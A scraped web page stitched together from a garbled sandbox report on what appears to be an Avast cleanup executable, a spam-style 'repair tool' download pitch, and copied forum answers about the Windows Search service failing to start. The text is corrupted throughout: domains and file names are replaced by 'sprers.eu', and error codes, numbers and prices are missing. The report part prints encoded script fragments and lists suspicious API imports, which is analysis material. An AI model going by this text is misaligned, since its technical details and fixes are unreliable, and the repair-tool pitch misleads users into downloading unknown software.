"hod_%sprers.eu%2Ci%29%3AobjRegistryExecMethod_%sprers.eu%2Ci%29%2C0%3D%sprers.euValue%26%26%28a%sprers.eu%29%7Dcatch%28l%29%7B%7Dreturn+a%7Dfunction+RegReadBinaryValue%28e%2Ct%2Cr%2Cn%29%7Bvar+a%3Btry%7B%22undefined%22%3D%3Dtypeof+n%26%26%28n%3D32%29%3Bvar+o%3Bo%3D32%3D%3Dn%sprers.eus_.Item%28%22GetBinaryValue%22%29%3AobjRegistryMethods_.Item%28%22GetBinaryValue%22%29%3Bvar+i%sprers.eunstance_%28%29%sprers.euy%3De%sprers.euyName%3Dt%sprers.euName%3Dr%3Bvar+c%3Bc%3D32%3D%3Dn%sprers.euthod_%sprers.eu%2Ci%29%3AobjRegistryExecMethod_%sprers.eu%2Ci%29%2C0%3D%sprers.euValue%26%26%28a%sprers.euy%28%29%29%7Dcatch%28l%29%7B%7Dreturn+a%7Dfunction+KillProc%28e%29%7Btry%7Bfor%28r%3Dnew+Enumerator%sprers.eucesOf%28%22Win32_Process%22%29%29%3B%sprers.eu%28%29%sprers.euxt%28%29%29%7Bvar+t%sprers.eu%28%29%sprers.eu%3D%3De%26%sprers.euate%28%29%7D%7Dcatch%28r%29%7B%7D%7Dfunction+GetProcessPath%28e%29%7Btry%7Bfor%28r%3Dnew+Enumerator%sprers.eucesOf%28%22Win32_P" (Indicator: "win32_process"; File: "sprers.eu") "SELECT * FROM Win32_VideoController WHERE DeviceID=&#;VideoController1&#;" (Indicator: "win32_videocontroller"; File: "sprers.eu") "SELECT * FROM Win32_Process" (Indicator: "win32_process"; File: "sprers.eu") "SELECT * FROM Win32_Process WHERE Handle = &#;" (Indicator: "win32_process"; File: "sprers.eu") "SELECT * FROM Win32_Process WHERE ExecutablePath = "" (Indicator: "win32_process"; File: "sprers.eu"), "Win32_LogicalDiskToPartition" (Indicator: "win32_logicaldisk"; File: "sprers.eu") source String relevance 10/10 ATT&CK ID T (Show technique in the MITRE ATT&CK™ matrix) • General • Network Related • Found potential IP address in binary/memory details Heuristic match: "/" "" Heuristic match: "" "" "" Heuristic match: "" Heuristic match: "" Heuristic match: "" Heuristic match: "" "" source String relevance 3/10 • Remote Access Related • Spyware/Information Retrieval • Found an instant messenger related domain details "sprers.eu" (Indicator: "sprers.eu"; File: "sprers.eu") "sprers.eu" (Indicator: "sprers.eu"; File: "sprers.eu") source String relevance 10/10 • Unusual Characteristics • Found TLS callbacks • Imports suspicious APIs details CryptEncrypt RegOpenKeyExW LookupAccountNameW RegOpenKeyExA SetSecurityDescriptorDacl CreateProcessAsUserW RegDeleteValueW RegCreateKeyExW RegCloseKey OpenProcessToken CreateServiceW RegEnumKeyExW RegEnumKeyExA StartServiceW RegDeleteKeyW RegEnumKeyW StartServiceCtrlDispatcherW GetDriveTypeW CreateFileMappingA GetFileAttributesA LockResource GetFileAttributesW UnhandledExceptionFilter GetTempPathA CheckRemoteDebuggerPresent GetTempPathW OutputDebugStringA DeviceIoControl CopyFileW OutputDebugStringW GetModuleFileNameW IsDebuggerPresent GetVersionExA GetModuleFileNameA LoadLibraryExA Process32FirstW LoadLibraryExW CreateThread TerminateProcess GetModuleHandleExW SleepEx CreateToolhelp32Snapshot LoadLibraryW GetVersionExW GetTickCount VirtualProtect LoadLibraryA GetFileSize OpenProcess DeleteFileA GetStartupInfoW CreateDirectoryW DeleteFileW GetProcAddress GetTempFileNameW WriteFile GetFileSizeEx FindNextFileW FindFirstFileW CreateFileMappingW CreateFileW CreateFileA GetComputerNameW Process32NextW GetCommandLineW MapViewOfFile GetModuleHandleA GetModuleHandleW GetFileAttributesExW FindResourceW CreateProcessW Sleep FindResourceA NetShareEnum EnumProcesses GetModuleFileNameExW ShellExecuteW ShellExecuteExW GetWindowThreadProcessId accept WSAStartup connect recv send WSASend listen closesocket socket bind recvfrom WSASocketW URLDownloadToFileW source Static Parser relevance 1/10 • PE file contains unusual section name details "sprers.eu" has a section named ".didat" source Static Parser relevance 10/10 • Environment Awareness • External Systems • General • Contains SQL queries details "SELECT * FROM ExeFiles;" "CREATE TABLE IF NOT EXISTS ActualProgramModifications (id INTEGER PRIMARY KEY AUTOINCREMENT, ProgID TEXT, Time DATE, Data TEXT);" "CREATE TABLE IF NOT EXISTS ActualEntryModifications (id INTEGER PRIMARY KEY AUTOINCREMENT, EntryID TEXT, EntryCategory TEXT, Time DATE, Data TEXT);" "CREATE TABLE IF NOT EXISTS AdobeReaderPluginModifications (id INTEGER PRIMARY KEY AUTOINCREMENT, PluginID TEXT, Time DATE, Data TEXT);" "CREATE TABLE IF NOT EXISTS %s (id INTEGER PRIMARY KEY AUTOINCREMENT, %s TEXT, %s TEXT, Time DATE, Data TEXT);" "CREATE TABLE IF NOT EXISTS ExeFiles (id INTEGER PRIMARY KEY AUTOINCREMENT, Exe TEXT, TUID TEXT, Path TEXT, AnalyzeTime DATE, Data TEXT);" "CREATE TABLE IF NOT EXISTS IgnoredPrograms (id INTEGER PRIMARY KEY AUTOINCREMENT, TUID TEXT, Time DATE);" "CREATE TABLE IF NOT EXISTS ProgramToEntriesMapping (id INTEGER PRIMARY KEY AUTOINCREMENT, TUID TEXT, UniqueID TEXT, Time DATE, Data TEXT);" "CREATE TABLE IF NOT EXISTS DebuggerRegistration (id INTEGER PRIMARY KEY AUTOINCREMENT, Exe TEXT, TUID TEXT);" "CREATE TABLE IF NOT EXISTS CompanyInfoCacheDate (TUID TEXT PRIMARY KEY, Time DateTime);" "CREATE TABLE IF NOT EXISTS CompanyInfoCache (TUID TEXT, CompanyName TEXT);" "SELECT 1 FROM CompanyInfoCache LIMIT 1;" "DELETE FROM ProgramToEntriesMapping;" "CREATE TABLE IF NOT EXISTS MsiFileInfoCacheDate (MsiDB TEXT PRIMARY KEY, Time DateTime);" "CREATE TABLE IF NOT EXISTS MsiFileInfoCache (MsiDB TEXT, FileName TEXT, FileSize TEXT, Path TEXT, ProductCode TEXT, MSIDisplayName TEXT);" "DELETE FROM CompanyInfoCache WHERE rowid NOT IN (SELECT MIN(ROWID) FROM CompanyInfoCache GROUP BY TUID, CompanyName);" "DELETE FROM MsiFileInfoCache; DELETE FROM MsiFileInfoCacheDate; DELETE FROM CompanyInfoCache; DELETE FROM CompanyInfoCacheDate;" "DELETE FROM ExeFiles;" "INSERT INTO ProgramToEntriesMapping(TUID, UniqueID, Data, Time) VALUES (&#;%s&#;, &#;%s&#;, &#;%s&#;, DateTime(&#;now&#;,&#;localtime&#;));" "SELECT DISTINCT ProgId FROM (SELECT ProgId FROM ActualProgramModifications UNION SELECT TUID FROM DebuggerRegistration UNION SELECT TUID FROM ProgramToEntriesMapping UNION SELECT %s FROM %s UNION SELECT %s FROM %s );" source String relevance 2/10 • The input sample is signed with a certificate details The input sample is signed with a certificate issued by "CN=DigiCert SHA2 Assured ID Code Signing CA, OU=sprers.eu, O=DigiCert Inc, C=US" (SHA1: FCE3:AB:EF:ED:CD:8F:BED:AE:C8:FA; see report for more information) The input sample is signed with a certificate issued by "CN=DigiCert Assured ID Root CA, OU=sprers.eu, O=DigiCert Inc, C=US" (SHA1: CEAFCEEBFBC6; see report for more information) The input sample is signed with a certificate issued by "CN=Microsoft Code Verification Root, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US" (SHA1: BA:3E:ADCDCE:1E:AA:FB:CBE; see report for more information) source Certificate Data relevance 10/10 ATT&CK ID T (Show technique in the MITRE ATT&CK™ matrix) • Network Related • Found potential URL in binary/memory details Heuristic match: "d:\build\work\01\cda6\projects\standalone\tuneup\common\protobuf\sprers.eu" Heuristic match: "sprers.eu" Pattern match: "sprers.eu" Heuristic match: "[email protected]" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\message_sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\generated_message_sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\stubs\sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\generated_message_sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\io\coded_sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\repeated_sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\wire_format_sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\reflection_sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\wire_sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\io\zero_copy_sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\io\zero_copy_stream_impl_sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\text_sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\extension_sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\stubs\sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\io\sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\io\sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\sprers.eu" Pattern match: "sprers.eu;descriptor" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\descriptor_sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\dynamic_sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\stubs\sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\map_sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\extension_set_sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\sprers.eu" Pattern match: "sprers.eu;ptype" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\util\internal\protostream_sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\util\type_resolver_sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\sprers.eu" Pattern match: "sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\source_sprers.eu" Pattern match: "sprers.eu;source_context" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\stubs\sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\util\internal\type_sprers.eu" Heuristic match: "s:\sources\sdk\vs \protobuf\b\vanilla\src\google\protobuf\sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Heuristic match: "d:\build\work\01\cda6\features\software_cleanup\src\swcuengine\sprers.eu" Heuristic match: "d:\build\work\01\cda6\features\software_cleanup\src\swcuengine\sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "wtpcom" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "afynet" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "active-srvde" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Pattern match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Pattern match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "mlsatde" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Pattern match: "sprers.eu*,http://*/*,https://*/*]},icons:{common/ui/icons/logo-safepricepng,common/ui/icons/logo-safepricepng,common/ui/icons/logo-safepricepng,common/ui/icons/logo-safepricepng},iconURL:null,icon6" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Heuristic match: "default_search_sprers.eu" Pattern match: "sprers.eu(AV[]{3})/.*" Heuristic match: "d:\build\work\01\cda6\features\browser_cleanup\src\server\cookie_sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "sprers.eu" Pattern match: "sprers.eu" Heuristic match: "sprers.eu" Heuristic match: "[email protected]" Heuristic match: "[email protected]" Pattern match: "sprers.eu*pc=.*AV0[].*" Pattern match: "sprers.eu?form=CONMHP&pc=cosp&query={searchTerms" Pattern match: "sprers.eu?pc=cosp&ptag=NAA&form=CONBDF&conlogo=CT&q={searchTerms" Pattern match: "sprers.eu*" Pattern match: "sprers.eu*pc=.*cosp.*ptag=NAA*" Pattern match: "sprers.eu*pc=.*AV0[].*" Pattern match: "sprers.eu*" Pattern match: "sprers.eu*pc=avmsp.*ocid=PerDHP.*" Pattern match: "sprers.eu?pc=avmsp&ocid=PerDHP" Pattern match: "sprers.eu*pc=.*AV0[].*" Pattern match: "sprers.eu*pc=cosp.*ptag=NAA*" Pattern match: "sprers.eu?pc=cosp&ptag=NAA&form=CONMHP&conlogo=CT" Pattern match: "sprers.eu*PC=AV0[].*" Pattern match: "sprers.eu?query={searchTerms" Pattern match: "sprers.eu*FORM=AVASDF&PC=AV0[].*" Heuristic match: "sprers.eu" Pattern match: "sprers.eu+sprers.eu" Pattern match: "sprers.eu+sprers.eu" Heuristic match: "<xmlattr>.name" Pattern match: "sprers.eu?LinkId=" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu" Pattern match: "sprers.eu?utm_medium=link&utm_source=safeprice&utm_campaign=avg-safeprice-welcome&utm_content=bcu-install" Pattern match: "sprers.eu?utm_medium=link&utm_source=safeprice&utm_campaign=avast-safeprice-welcome&utm_content=bcu-install" Heuristic match: "sprers.eu" Pattern match: "sprers.eu" source String relevance 10/10 • Spyware/Information Retrieval • Unusual Characteristics ### File Details All Details: ### File Sections DetailsNameEntropyVirtual AddressVirtual SizeRaw SizeMD5Characteristics Name .text Entropy Virtual Address 0x Virtual Size 0x6ec5cb Raw Size 0x6ec MD5 17eaae6cebaaefbfdddb6f3 .text0x0x6ec5cb0x6ec17eaae6cebaaefbfdddb6f3- Name .rdata Entropy Virtual Address 0x6ee Virtual Size 0x19a Raw Size 0x19a MD5 e19d3bae9b66dac8be4efcb .rdata0x6ee0x19a0x19ae19d3bae9b66dac8be4efcb- Name .data Entropy Virtual Address 0x Virtual Size 0x Raw Size 0x MD5 4ae5cbedf5beecc .data0x0x0x4ae5cbedf5beecc- Name .didat Entropy Virtual Address 0x8cc Virtual Size 0x9c Raw Size 0x MD5 dce7e6cbdddca6dc3b84e .didat0x8cc0x9c0xdce7e6cbdddca6dc3b84e- Name .rsrc Entropy Virtual Address 0x8cd Virtual Size 0x Raw Size 0x MD5 ca08e2faabcbcb7 .rsrc0x8cd0x0xca08e2faabcbcb7- Name .reloc Entropy Virtual Address 0x Virtual Size 0x6f8c8 Raw Size 0x6fa00 MD5 fedcae4ca6de47df7a9 .reloc0x0x6f8c80x6fa00fedcae4ca6de47df7a9- ### File Resources ### File Imports Terms ## How to fix the Runtime Code Avast! Antivirus Error Last Updated: 01/09/21 : A Android user voted that repair method 1 worked for them. Recommended Repair Tool: This repair tool can fix common computer problems such as blue screens, crashes and freezes, missing DLL files, as well as repair malware/virus damage and more by replacing damaged and missing system files. ###### STEP 1: Click Here to Downloadand install the Windows repair tool. ###### STEP 2: Click on Start Scanand let it analyze your device. ###### STEP 3: Click on Repair Allto fix all of the issues it detected. DOWNLOAD NOW Compatibility Requirements 1 Ghz CPU, MB RAM, 40 GB HDD This download offers unlimited scans of your Windows PC for free. Full system repairs start at$
Article ID: ACXEN
Applies To: Windows 10, Windows , Windows 7, Windows Vista, Windows XP, Windows
##### Speed Up Tip #83
Setup Multiple Drives:
If you are an advanced user, you can boost your system performance by installing multiple hard drives into your computer. Then, you can set these new drives into a RAID 0 to make a fast single virtual drive. You can also, set up RAID 5 or any of the other RAID configurations depending on your needs.
## Windows Search service does not (Windows 7)
• window search service does not
the window search service does not not how can I solve this problem?
Hello
From the desktop, hold down the Windows key and press R. In the run window, type sprers.eu and press to enter. Navigate down to the search service Windows, made a right click and select Properties.
In the drop-down list next to Start up type select Automatic (for windows 8 or select automatic delayed start) and then click apply and then click Ok.
Restart the computer.
Kind regards
DP - K
• Windows Search service does not have to create the search index created, 0xd66, failed to add the Application to collect internal error
events
The most recent Instance was on:
Error of search service search
Log name: Application
Source: Microsoft-Windows-search
Publication date:
Event ID:
Level: error
Keywords: Classic
Trial has been on:
Error research service
Previous info from event viewer.
Services:
Windows Search
Start the service
Error message:
Windows could not start the Windows search on the Local computer. For
non-Microsoft service, contact the service vendor and refer to
service special error code.
Windows Journal system (in the event viewer) for the Date and this has occurred first:
Error on Service Control Manager Eventlog Provider no
The Windows Search service stopped with the special service (0xD23) error.
Log name: System
Source: Service Control Manager
Date:
Event ID:
Level: error
Keywords: Classic
We are all ONE!
I tried some of the solutions that offered you, but I think what was my problem was caused by the presence of the index on an external hard drive and when the computer has been restarted the drive letter of the USB drive was not the same. If I remember well, it was a problem that I wasn't yet able to rebuild the index.
I now have the index on my hard C at the level of the root drive. I was about to point to the other half of a 16 GB flash drive which is also USB, but Windows Vista Home Premium does not only because it appears that are considered removable flash drives, but external USB drives are not presented in this category.
Currently I have about 74 items indexed.
We are all ONE!
• Windows 7 search service does not start. Error references . How can I get this service began so my OneNote notebooks are available?
I am unable to get windows search to start from the Administration Panel. The error box refers to error code I want to get this started so I can take advantage of OneNote search functions.
Troubleshooting Windows 7 & Vista search & indexing errors
sprers.eu
You could look at reset or rebuild the search Index.
How to use Indexing Options in Vista (and probably Win 7)
sprers.eucom/tutorials/sprers.eu
Try the system restore and the System File Checker.
How to repair the operating system and how to restore the configuration of the operating system to an earlier point in time in Windows Vista (or 7)
sprers.eu#appliesTo
How to analyze the entries in the log file generating the program Checker (sprers.eu) resources of Microsoft Windows in Windows Vista
sprers.eu#appliesTo
How to troubleshoot a problem by performing a clean boot in Windows Vista or in Windows 7
sprers.eu
Try running ChkDsk to check your drive for errors. Right click on your drive icon / properties / tools / error checking. Try first by checking do not each box (that it will run in read-only mode) to see if it reports any problems file or hard drive. If so, restart it by checking both boxes and restart to allow him to attempt to fix any problems found.
Are there problems with other Services that may be running or from?
• Windows Update service does not and Outlook advanced search does not
Have Vista Home Premium on an HP laptop. Running Norton Internet Security Antivirus and firewall.
There is a month upgrade Office to Office
With Office , I used to give a list of updates, and I would choose where I wanted to, but noticed
recently that I had no updates online. When I click on the button to make an update, nothing happens.
In addition, advanced search in Outlook does not work, it ends in a microsecond and produces no result.
Tried to change updates to not automatically updated, and then again on auto - no effect.
Tried to go in safe mode and still couldn't do an update.
Have run ccleaner and sprers.eu Windows don't repair - no effect
A ran a repair on Office no effect
Have checked in that Crypto, BITS and Windows Update are all in automatic mode and Services are started.
Have run the Fixit for update problems, - no effect.
Running the program and got - Windows Update Standalone Installation Setup met with an error-0xc
Ran sfc/scannow and it brings just a search without search results window.
Have noticed in the Event Viwer:
In the Application logs:
The Cryptographic Services service failed to initialize the catalog database. The ESENT error is ID
I also get a warning on:
The Windows Search Service tries to remove the old catalog.
and a error:
The Windows Search Service cannot open the Jet property store.
Details: The content index server cannot update or access information because of a database error.
Stop and restart the search service. If the problem persists, reset and recrawl the content index. In some cases, it may be necessary to delete and recreate the content index. (0xf)
and an error
The Windows Search Service has not to create the search index creates. Internal error
and warning
Research is unable to complete the indexing of your Outlook data. Indexing cannot continue to
C:\Users\Bill\AppData\Local\Microsoft\Outlook\sprers.eu (error = 0 x ). If this error persists,
Contact Microsoft Support.
And in the system logs:
Error
The Windows Search service stopped with the special service (0xD23) error.
Help. It makes me crazy!
No probs.
Though even this is not for your laptop, it has fast storage to Intel for chipset driver, it uses (ICH8M-E/M SATA AHCI Controller) you can see under the required System Configuration
Here
This is for XP 32/64 and Vista 32 / bit. And Win7 32/64 bit
It is version It may not be the latest version out at the mo. But his more later than the version installed
You can either double-click SP, then follow what it says on the screen, then restart. Then see if WU works
Or an extract SP with something like 7-zip / winrar (select Extract to SP\). So, it extracts the files in folders.
Then go to the entry SATA in DM. Go to the driver tab / driver update / browse computer / let me choose.
Point to the folder that you extracted. Then the folder the folder drivers then the x Since you are using bit. And then click OK. It may show ICH8M-E/M (if it captures previous drivers / or if there is already an entry of controller for ICH8M-E/M). If you press ok / then following to load the drivers for it. Once he finished update the SATA drivers, restart
Looks like you need to .net framework (or higher) for this. Don't think that you need this if you check out the file, and then add through the DM tho. If you double click on the file
• Windows Search service will not work.
Windows Search service will not work. In the event log, it says "Windows Search service terminated with service specific error %
Hi Russ,
1. When was the last time it was working fine?
2. Did you the latest changes on the computer?
3. You are able to start the service manually?
I suggest that you try manually start the service Windows search and check if it works.
(a) click Start type sprers.eu in the search box, and then click OK.
(b) in the Services (Local) list, right-click Windows Search, and then click Properties.
(c) if the drop-down list Startup type is set to the value off, select Automaticfrom the drop-down list Startup type and then click OK.
(d) click thefile menu and then click exit.
If fails it above step then check out the link below and run the fixit from microsoft tool available.
Windows search does not work and the search is slow or stops
sprers.eu?EntryPoint=lightbox
I hope this helps!
Halima S - Microsoft technical support.
• Windows Update cannot currently check the update, because the service does not work, you may need to restart your computer
My computer stops the update via WIndows Update Component
